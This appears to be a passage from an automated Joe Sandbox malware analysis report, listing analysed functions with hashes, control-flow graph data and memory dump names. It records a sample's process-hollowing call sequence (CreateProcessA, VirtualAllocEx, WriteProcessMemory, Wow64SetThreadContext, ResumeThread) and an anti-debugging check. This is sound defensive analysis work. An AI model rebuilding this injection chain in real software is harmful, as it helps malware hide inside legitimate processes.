                                                                                        • Instruction Fuzzy Hash: 992137B1800259CFDB00CF9AD884BEEFBF4AF49324F24846AD855B7250D778AA44CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001C5340 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1298 1c5340-1c53cc CheckRemoteDebuggerPresent 1300 1c53ce-1c53d4 1298->1300 1301 1c53d5-1c5410 1298->1301 1300->1301
                                                                                        APIs
                                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 001C53BF
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.718032319.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_1c0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID: CheckDebuggerPresentRemote
                                                                                        • String ID:
                                                                                        • API String ID: 3662101638-0
                                                                                        • Opcode ID: 7c69591ff36b1294227ac80c95902ecc665e22bb2b5417c2e1d226a7c9feafc8
                                                                                        • Instruction ID: 946b8b6e046fd15bac647b3c7235780dbb28e52b6bea7c91ef215d45a41699c4
                                                                                        • Opcode Fuzzy Hash: 7c69591ff36b1294227ac80c95902ecc665e22bb2b5417c2e1d226a7c9feafc8
                                                                                        • Instruction Fuzzy Hash: C32166B1800249CFCB00CFAAD884BEEBBF0AF49310F24842AD845B7251C378AA44CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004FA538 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1310 4fa538-4fa582 1312 4fa58e-4fa5c0 SetWindowsHookExA 1310->1312 1313 4fa584-4fa58c 1310->1313 1314 4fa5c9-4fa5e9 1312->1314 1315 4fa5c2-4fa5c8 1312->1315 1313->1312 1315->1314
                                                                                        APIs
                                                                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 004FA5B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.718182561.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_4f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID: HookWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2559412058-0
                                                                                        • Opcode ID: d96593d6fc062648d51a89933f5843b7b309acdd89f643d24a54184eab6f5c5f
                                                                                        • Instruction ID: 150c234869a8d3544c7dfe19a8cf0fab5dac1950d7e503ce8ffebe7ba27be266
                                                                                        • Opcode Fuzzy Hash: d96593d6fc062648d51a89933f5843b7b309acdd89f643d24a54184eab6f5c5f
                                                                                        • Instruction Fuzzy Hash: BC21E8B5900209DFDB14CF99D844BEEBBF5EB88314F14842AE419A7250C774AA44CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0016D394 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.717931261.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_16d000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7e412644f590ded1e76618d4eaf540fd7a613143c0e104ba0dc9ecd405282eaf
                                                                                        • Instruction ID: 5c4def56631e932d34473f2dcfed0a2cb092a0f4650cafcd9f6b1e7ea77b0aba
                                                                                        • Opcode Fuzzy Hash: 7e412644f590ded1e76618d4eaf540fd7a613143c0e104ba0dc9ecd405282eaf
                                                                                        • Instruction Fuzzy Hash: 6821B375B04240EFDB04CF14EDC4B26BB65FB84714F24C569D8494B646C736E866CA62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0016D01C Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.717931261.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_16d000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f1dbffdbda5c9c8edcfc78581d8c5b5b2f1002de123f9ca2ac36603b22506640
                                                                                        • Instruction ID: f207e55360f9c669e334706274da970dd217a81226a14a9fea5356604f0e82d0
                                                                                        • Opcode Fuzzy Hash: f1dbffdbda5c9c8edcfc78581d8c5b5b2f1002de123f9ca2ac36603b22506640
                                                                                        • Instruction Fuzzy Hash: AA21B075A04340DFDB14DF14EDC4B26BB65EB84314F34C5A9E8494B246C33AD867CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0016D006 Relevance: .1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.717931261.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_16d000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d901ba2131a10237530b1c378adfcf47bd133f4bf10198aaa990114cc4e6c31a
                                                                                        • Instruction ID: 6baf45fdc843e4dd6cbc2bc20099be3736944573ad89ae7abc89654c5beb6630
                                                                                        • Opcode Fuzzy Hash: d901ba2131a10237530b1c378adfcf47bd133f4bf10198aaa990114cc4e6c31a
                                                                                        • Instruction Fuzzy Hash: 1F217C755093808FDB02CF24D994B15BF71EB46314F28C5EAD8498B2A7C33A981ACB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0016D38F Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.717931261.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_16d000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ea9aa13de3af6688b0190c548424d43cac2c886abfbda61e17135b2a085f984b
                                                                                        • Instruction ID: f3d3e06189c58b35dd6ca7c292c78ad3de0d34b32150f2a8858e792cb6df7385
                                                                                        • Opcode Fuzzy Hash: ea9aa13de3af6688b0190c548424d43cac2c886abfbda61e17135b2a085f984b
                                                                                        • Instruction Fuzzy Hash: A811DD75A04280DFDB01CF10E9C4B15BFB1FB84314F24C6A9D8494BA52C33AE85ACFA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0015D849 Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.717883394.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_15d000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f016ded05d6a3b898844d873a64bc787e2fa2c4acbbc8a63a3c08bb8385add55
                                                                                        • Instruction ID: 9e37034c340164fd11b08efc1125e1f498924af063f8819476fd41e3d83ebff9
                                                                                        • Opcode Fuzzy Hash: f016ded05d6a3b898844d873a64bc787e2fa2c4acbbc8a63a3c08bb8385add55
                                                                                        • Instruction Fuzzy Hash: F501F730104340EAF7345A15EC84766BF98DF81775F28C526DC251F282C379D848CB72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0015D848 Relevance: .0, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.717883394.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_15d000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a10a46bcd036f49d6922f7573a9ae3f93d9f7219222e0d5d2fe5b247d65bd012
                                                                                        • Instruction ID: e24f6cd0a87f0437d636d8603884f38288595a700249b325b6d16602183c5de7
                                                                                        • Opcode Fuzzy Hash: a10a46bcd036f49d6922f7573a9ae3f93d9f7219222e0d5d2fe5b247d65bd012
                                                                                        • Instruction Fuzzy Hash: F8F06271504244EEE7208A16DCC4B62FF98EF81734F28C56AED185F282C3799948CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:17.7%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:118
                                                                                        Total number of Limit Nodes:8
                                                                                        execution_graph 10850 aa6bba 10855 aa8ac8 10850->10855 10871 aa8b28 10850->10871 10887 aa8ad8 10850->10887 10851 aa6b99 10856 aa8a6d 10855->10856 10857 aa8ad3 10855->10857 10856->10851 10857->10856 10902 aa945c 10857->10902 10907 aa914e 10857->10907 10911 aa909e 10857->10911 10918 aa9269 10857->10918 10922 aa95f9 10857->10922 10926 aa9558 10857->10926 10930 aa9984 10857->10930 10933 aa8ee1 10857->10933 10938 aa9043 10857->10938 10947 aa8f02 10857->10947 10952 aa915d 10857->10952 10957 aa987d 10857->10957 10858 aa8afa 10858->10851 10872 aa8acd 10871->10872 10873 aa8a6d 10872->10873 10875 aa9558 WriteProcessMemory 10872->10875 10876 aa95f9 WriteProcessMemory 10872->10876 10877 aa9269 2 API calls 10872->10877 10878 aa909e 3 API calls 10872->10878 10879 aa914e WriteProcessMemory 10872->10879 10880 aa945c 2 API calls 10872->10880 10881 aa987d WriteProcessMemory 10872->10881 10882 aa915d 2 API calls 10872->10882 10883 aa8f02 2 API calls 10872->10883 10884 aa9043 4 API calls 10872->10884 10885 aa8ee1 2 API calls 10872->10885 10886 aa9984 WriteProcessMemory 10872->10886 10873->10851 10874 aa8afa 10874->10851 10875->10874 10876->10874 10877->10874 10878->10874 10879->10874 10880->10874 10881->10874 10882->10874 10883->10874 10884->10874 10885->10874 10886->10874 10888 aa8af2 10887->10888 10890 aa9558 WriteProcessMemory 10888->10890 10891 aa95f9 WriteProcessMemory 10888->10891 10892 aa9269 2 API calls 10888->10892 10893 aa909e 3 API calls 10888->10893 10894 aa914e WriteProcessMemory 10888->10894 10895 aa945c 2 API calls 10888->10895 10896 aa987d WriteProcessMemory 10888->10896 10897 aa915d 2 API calls 10888->10897 10898 aa8f02 2 API calls 10888->10898 10899 aa9043 4 API calls 10888->10899 10900 aa8ee1 2 API calls 10888->10900 10901 aa9984 WriteProcessMemory 10888->10901 10889 aa8afa 10889->10851 10890->10889 10891->10889 10892->10889 10893->10889 10894->10889 10895->10889 10896->10889 10897->10889 10898->10889 10899->10889 10900->10889 10901->10889 10903 aa9178 10902->10903 10904 aa9190 10903->10904 10962 aa5e98 10903->10962 10966 aa5e96 10903->10966 10904->10858 10908 aa97fb 10907->10908 10970 aa61e0 10908->10970 10974 aa60b8 10911->10974 10978 aa60b4 10911->10978 10912 aa97de 10912->10858 10913 aa90bf 10913->10912 10917 aa61e0 WriteProcessMemory 10913->10917 10914 aa92df 10914->10858 10917->10914 10982 aa5f88 10918->10982 10986 aa5f84 10918->10986 10919 aa9286 10923 aa9037 10922->10923 10924 aa9049 10923->10924 10925 aa61e0 WriteProcessMemory 10923->10925 10924->10858 10925->10923 10929 aa61e0 WriteProcessMemory 10926->10929 10927 aa9037 10927->10926 10928 aa9049 10927->10928 10928->10858 10929->10927 10932 aa61e0 WriteProcessMemory 10930->10932 10931 aa99ab 10932->10931 10934 aa8eed 10933->10934 10935 aa9012 10934->10935 10990 aa6578 10934->10990 10994 aa6573 10934->10994 10935->10935 10939 aa8fe1 10938->10939 10940 aa9047 10938->10940 10943 aa6578 CreateProcessA 10939->10943 10944 aa6573 CreateProcessA 10939->10944 10998 aa6340 10940->10998 11002 aa6338 10940->11002 10941 aa9012 10941->10941 10942 aa907f 10942->10858 10943->10941 10944->10941 10948 aa8eed 10947->10948 10949 aa9012 10948->10949 10950 aa6578 CreateProcessA 10948->10950 10951 aa6573 CreateProcessA 10948->10951 10949->10949 10950->10949 10951->10949 10953 aa9167 10952->10953 10955 aa5e98 ResumeThread 10953->10955 10956 aa5e96 ResumeThread 10953->10956 10954 aa9190 10954->10858 10955->10954 10956->10954 10958 aa981a 10957->10958 10960 aa9881 10957->10960 10961 aa61e0 WriteProcessMemory 10958->10961 10959 aa92df 10959->10858 10960->10858 10961->10959 10963 aa5edc ResumeThread 10962->10963 10965 aa5f2e 10963->10965 10965->10904 10967 aa5edc ResumeThread 10966->10967 10969 aa5f2e 10967->10969 10969->10904 10971 aa622c WriteProcessMemory 10970->10971 10973 aa62cb 10971->10973 10973->10858 10975 aa60fc VirtualAllocEx 10974->10975 10977 aa617a 10975->10977 10977->10913 10979 aa60fc VirtualAllocEx 10978->10979 10981 aa617a 10979->10981 10981->10913 10983 aa5fd1 Wow64SetThreadContext 10982->10983 10985 aa604f 10983->10985 10985->10919 10987 aa5fd1 Wow64SetThreadContext 10986->10987 10989 aa604f 10987->10989 10989->10919 10991 aa65ff CreateProcessA 10990->10991 10993 aa685d 10991->10993 10993->10993 10995 aa65ff CreateProcessA 10994->10995 10997 aa685d 10995->10997 10997->10997 10999 aa638c ReadProcessMemory 10998->10999 11001 aa640a 10999->11001 11001->10942 11003 aa638c ReadProcessMemory 11002->11003 11005 aa640a 11003->11005 11005->10942

                                                                                        Executed Functions

                                                                                        Function 002FBC78 Relevance: 4.1, Strings: 3, Instructions: 377COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 91 2fbc78-2fbc9f 92 2fbcd7-2fbcdc 91->92 93 2fbca1-2fbca4 92->93 94 2fbcad-2fbcc4 93->94 95 2fbca6 93->95 108 2fbddf-2fbe57 94->108 111 2fbcca-2fbcd5 94->111 95->92 95->94 96 2fbdbf-2fbdd2 95->96 97 2fbcde-2fbcea 95->97 98 2fbd8b-2fbd93 95->98 99 2fbdd5-2fbdda 95->99 100 2fbd24-2fbd2d 95->100 101 2fbd44-2fbd5a 95->101 102 2fbd71-2fbd7e 95->102 103 2fbd81-2fbd86 95->103 106 2fbcec-2fbcf6 97->106 107 2fbd09-2fbd10 97->107 104 2fbd9a-2fbd9c 98->104 105 2fbd95-2fbd99 98->105 99->93 100->108 109 2fbd33-2fbd3f 100->109 101->108 122 2fbd60-2fbd6c 101->122 102->103 103->93 112 2fbd9e 104->112 113 2fbda8-2fbdaf 104->113 105->104 106->108 114 2fbcfc-2fbd02 106->114 107->108 115 2fbd16-2fbd22 107->115 123 2fbe90-2fbe95 108->123 109->93 111->93 118 2fbda3 112->118 113->108 120 2fbdb1-2fbdbd 113->120 119 2fbd07 114->119 115->119 118->93 119->93 120->118 122->93 124 2fbe59-2fbe5c 123->124 125 2fbe5e 124->125 126 2fbe65-2fbe7c 124->126 125->123 125->126 127 2fbf0d-2fbf15 125->127 128 2fbf4b-2fbf5b 125->128 129 2fbf4a 125->129 130 2fbf1a-2fbf2b 125->130 131 2fbe97-2fbea8 125->131 132 2fbf83-2fbf8d 125->132 133 2fbf60-2fbf67 125->133 134 2fbf90-2fbf97 125->134 140 2fbfa9-2fc020 126->140 142 2fbe82-2fbe8e 126->142 127->124 128->124 129->128 147 2fbf31-2fbf38 130->147 138 2fbeaa-2fbeb1 131->138 139 2fbf06-2fbf0b 131->139 136 2fbf6e-2fbf70 133->136 137 2fbf69-2fbf6d 133->137 134->140 141 2fbf99-2fbfa4 134->141 143 2fbf7c-2fbf81 136->143 144 2fbf72 136->144 137->136 138->140 145 2fbeb7-2fbecc 138->145 146 2fbf01 139->146 153 2fc027-2fc047 140->153 154 2fc022 140->154 141->124 142->124 149 2fbf77 143->149 144->149 145->140 150 2fbed2-2fbeed 145->150 146->124 147->140 148 2fbf3a-2fbf45 147->148 148->124 149->124 150->140 152 2fbef3-2fbefc 150->152 152->146 155 2fc04d-2fc200 153->155 156 2fc126-2fc12c 153->156 154->153 165 2fc2a7-2fc2ae 155->165 157 2fc133-2fc139 156->157 158 2fc13b 157->158 159 2fc140-2fc160 157->159 158->159 159->157 161 2fc162-2fc173 159->161 163 2fc189-2fc19c 161->163 164 2fc175-2fc186 161->164 166 2fc112-2fc118 163->166 167 2fc1a2-2fc1ad 163->167 164->163 165->166 170 2fc121-2fc125 166->170 168 2fc10b-2fc10d 167->168 169 2fc1b3-2fc1f3 167->169 168->165 168->166 170->156
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: /$/$/
                                                                                        • API String ID: 0-3284904579
                                                                                        • Opcode ID: e1af24270335f1a161a4950cb5915612cc576c44a7d2543f5a0fbe6d9ce4e61b
                                                                                        • Instruction ID: 5bc91f67604b474fc3b458aab5d1ed6eedfa6db8348eda10179bfb4d7ae2d267
                                                                                        • Opcode Fuzzy Hash: e1af24270335f1a161a4950cb5915612cc576c44a7d2543f5a0fbe6d9ce4e61b
                                                                                        • Instruction Fuzzy Hash: 47E17831A24219CFCB11CFA8C880AFEFBF1AF49340F14817AE619EB292D7749955CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FD0B8 Relevance: .4, Instructions: 423COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 41337fd59909131cbae2557b28dd32429adc1c3c3ee99cdbbfc068d957212c8b
                                                                                        • Instruction ID: 6dd26cdd79fc24ede62272e990e761fb4bf5ad0df2c61473c56b80763318c2e2
                                                                                        • Opcode Fuzzy Hash: 41337fd59909131cbae2557b28dd32429adc1c3c3ee99cdbbfc068d957212c8b
                                                                                        • Instruction Fuzzy Hash: 52F1F230A2920ACFD710DB78C8906BEFBB2AF85340F14817BE655DB285D774D862CB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FE0D0 Relevance: .2, Instructions: 244COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 35b1ddc282e3e7b2debd6821bd43f47dce5fff3c7cff0978c9f25b5433fba1be
                                                                                        • Instruction ID: efea84fcef4f59d743f2468e448eb253ba342258ee0f6a07ef41d8d8f60486f0
                                                                                        • Opcode Fuzzy Hash: 35b1ddc282e3e7b2debd6821bd43f47dce5fff3c7cff0978c9f25b5433fba1be
                                                                                        • Instruction Fuzzy Hash: B5915C31A29389CFDB238F258C5467BFBB1AF41740F1681BBD6568B2B2D6B48C50C752
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F8DB0 Relevance: .2, Instructions: 212COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2af115f879d317194fd610e17f83eab50a8d4caed4dc253e3562887cf7f5eca0
                                                                                        • Instruction ID: 6805b77e1efc9a389b7ba9a87f55aebabc4b4e36221c0e0241674217bf992e20
                                                                                        • Opcode Fuzzy Hash: 2af115f879d317194fd610e17f83eab50a8d4caed4dc253e3562887cf7f5eca0
                                                                                        • Instruction Fuzzy Hash: AE81E431A2824ACFC7118F68C8806BAFBF1EF42340F5485BBE256D7291DB74D965C712
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FB05D Relevance: 4.2, Strings: 3, Instructions: 451COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 2fb05d-2fb067 1 2fb071-2fb0d6 0->1 5 2fb0df-2fb0e0 1->5 6 2fb0d8 1->6 7 2fb137-2fb13d 5->7 6->5 8 2fb13f-2fb201 7->8 9 2fb0e2-2fb104 7->9 20 2fb203-2fb23c 8->20 21 2fb242-2fb246 8->21 10 2fb10b-2fb134 9->10 11 2fb106 9->11 10->7 11->10 20->21 22 2fb248-2fb281 21->22 23 2fb287-2fb28b 21->23 22->23 25 2fb28d-2fb2c6 23->25 26 2fb2cc-2fb2d0 23->26 25->26 28 2fb2d6-2fb2ee 26->28 29 2fb354-2fb3af 26->29 31 2fafce-2fafd2 28->31 32 2fb2f4-2fb2fb 28->32 47 2fb3e6-2fb410 29->47 48 2fb3b1-2fb3e4 29->48 34 2fafd4-2fb00c 31->34 35 2fb021-2fb057 31->35 33 2fb342-2fb346 32->33 37 2fb34c-2fb352 33->37 38 2faeaa-2faeae 33->38 62 2fb4c1-2fb4c6 34->62 35->0 49 2faef5-2faf02 35->49 37->29 39 2fb2fd-2fb33f 37->39 40 2faec3-2faec9 38->40 41 2faeb0-2faebe 38->41 39->33 46 2faf14-2faf18 40->46 45 2faf43-2faf75 41->45 78 2faf9f 45->78 79 2faf77-2faf83 45->79 53 2faecb-2faed7 46->53 54 2faf1a-2faf31 46->54 64 2fb419-2fb486 47->64 48->64 50 2faf08-2faf0f 49->50 51 2fae67-2fae8b 49->51 50->54 67 2faf39-2faf3d 51->67 60 2faede-2faee3 53->60 61 2faed9 53->61 57 2faee6-2faeec 54->57 58 2faf33-2faf36 54->58 70 2faeee-2faef2 57->70 71 2faf11 57->71 58->67 60->57 61->60 68 2fb4dd-2fb4fc 62->68 69 2fb4c8-2fb4d6 62->69 89 2fb48c-2fb498 64->89 67->45 72 2fae90-2faea7 67->72 75 2fae1f-2fb570 68->75 76 2fb502-2fb509 68->76 69->68 70->49 71->46 72->38 81 2fafa5-2fafcb 78->81 83 2faf8d-2faf93 79->83 84 2faf85-2faf8b 79->84 81->31 87 2faf9d 83->87 84->87 87->81 90 2fb49f-2fb4b2 89->90 90->62
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: :$p!p$~
                                                                                        • API String ID: 0-320839381
                                                                                        • Opcode ID: b07538545d598bac344557eab105543b5b921154b79f4d7e57bbbdbeebbae2ca
                                                                                        • Instruction ID: daeafaf1929274d4e1a7bee8338c33fbd4cdf79ed993864869a2a813bad4f6e3
                                                                                        • Opcode Fuzzy Hash: b07538545d598bac344557eab105543b5b921154b79f4d7e57bbbdbeebbae2ca
                                                                                        • Instruction Fuzzy Hash: D722E675910219DFDB25CF64C984EA9BBB2FF48304F1580E5E609AB222D732DD91DF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F7CBE Relevance: 3.9, Strings: 3, Instructions: 179COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 174 2f7cbe 175 2f7cc3-2f7cc6 174->175 176 2f7cd8-2f7ce7 175->176 177 2f7cc8 175->177 194 2f7cff-2f7d1c 176->194 195 2f7ce9-2f7cef 176->195 177->176 178 2f803d-2f808b 177->178 179 2f7efb-2f7f05 177->179 180 2f7e68-2f7e7b 177->180 181 2f80a2-2f80b6 177->181 182 2f7fa1-2f7fa5 177->182 184 2f80c5 178->184 245 2f808d-2f8096 178->245 183 2f7f0b-2f7f17 179->183 179->184 180->184 200 2f7e81-2f7e89 180->200 185 2f7fc8 182->185 186 2f7fa7-2f7fb0 182->186 183->175 184->184 189 2f7fcb-2f7fcf 185->189 192 2f7fb7-2f7fc4 186->192 193 2f7fb2-2f7fb5 186->193 198 2f7ff2 189->198 199 2f7fd1-2f7fda 189->199 202 2f7fc6 192->202 193->202 212 2f7d3f 194->212 213 2f7d1e-2f7d27 194->213 196 2f7cf3-2f7cf5 195->196 197 2f7cf1 195->197 196->194 197->194 210 2f7ff5-2f8001 198->210 204 2f7fdc-2f7fdf 199->204 205 2f7fe1-2f7fee 199->205 207 2f7eac 200->207 208 2f7e8b-2f7e94 200->208 202->189 211 2f7ff0 204->211 205->211 217 2f7eaf-2f7eb1 207->217 214 2f7e9b-2f7ea8 208->214 215 2f7e96-2f7e99 208->215 230 2f8019-2f8026 210->230 231 2f8003-2f8009 210->231 211->210 223 2f7d42-2f7d4c 212->223 218 2f7d2e-2f7d3b 213->218 219 2f7d29-2f7d2c 213->219 221 2f7eaa 214->221 215->221 225 2f7ec3 217->225 226 2f7eb3-2f7ec1 217->226 228 2f7d3d 218->228 219->228 221->217 237 2f7d57-2f7d69 223->237 227 2f7ec5-2f7ec7 225->227 226->227 232 2f7ec9-2f7ecf 227->232 233 2f7ee1-2f7ef6 227->233 228->223 230->184 234 2f802c-2f8038 230->234 238 2f800d-2f800f 231->238 239 2f800b 231->239 240 2f7ed3-2f7edf 232->240 241 2f7ed1 232->241 233->175 234->175 247 2f7d6b call 2f8f08 237->247 248 2f7d6b call 2f8da0 237->248 249 2f7d6b call 2f8db0 237->249 250 2f7d6b call 2f8fe0 237->250 238->230 239->230 240->233 241->233 243 2f7d71-2f7d79 243->175 247->243 248->243 249->243 250->243
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: f"p$ f"p$ f"p
                                                                                        • API String ID: 0-381425725
                                                                                        • Opcode ID: 4e6ba40817a772dfefb4614207f0814832194908e44dd2a6127dac9558fb8320
                                                                                        • Instruction ID: 1aa0b6d1cc2c2c96c74c8656358e7d7540bc539820557d4434ba1b7ca7015eec
                                                                                        • Opcode Fuzzy Hash: 4e6ba40817a772dfefb4614207f0814832194908e44dd2a6127dac9558fb8320
                                                                                        • Instruction Fuzzy Hash: 1F617D30E2821DDFDB248F94D544ABDF3B2BB84381F65457AE602AB3A0CBB09C51CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F1874 Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
